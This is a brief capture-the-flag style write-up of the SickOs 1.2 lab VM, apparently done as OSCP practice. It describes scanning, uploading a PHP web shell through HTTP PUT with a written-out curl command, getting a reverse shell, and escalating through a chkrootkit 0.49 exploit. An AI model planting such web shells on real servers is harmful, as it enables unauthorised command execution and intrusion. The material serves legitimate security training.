Name: SickOs: 1.2
Date release: 27 Apr 2016
Initial scan results show TCP 22 and 80 running SSH and lighttpd respectively.
Kicked off dirb and found a test folder.
Checked the options on the test folder…and saw that the server allows put.
Used the following command to put a php shell on the target. The command puts the php command into the shell.php file on the target.
curl -v -X PUT -d ‘<?php echo shell_exec($_GET[“cmd”]);?>’ http://10.11.1.6/test/shell.php
Then tested for command execution.
Used the Python shell from pentestmonkey to get a reverse shell.
Browsed through syslog and found chkrootkit running every minute or so.
chrookit version = 0.49
This looks promising 🙂 – https://www.exploit-db.com/exploits/33899/
Following the exploit above…
and a few minutes later…
I completed this vm while studying for the OSCP and felt that it helped in the learning process. Thanks D4rk!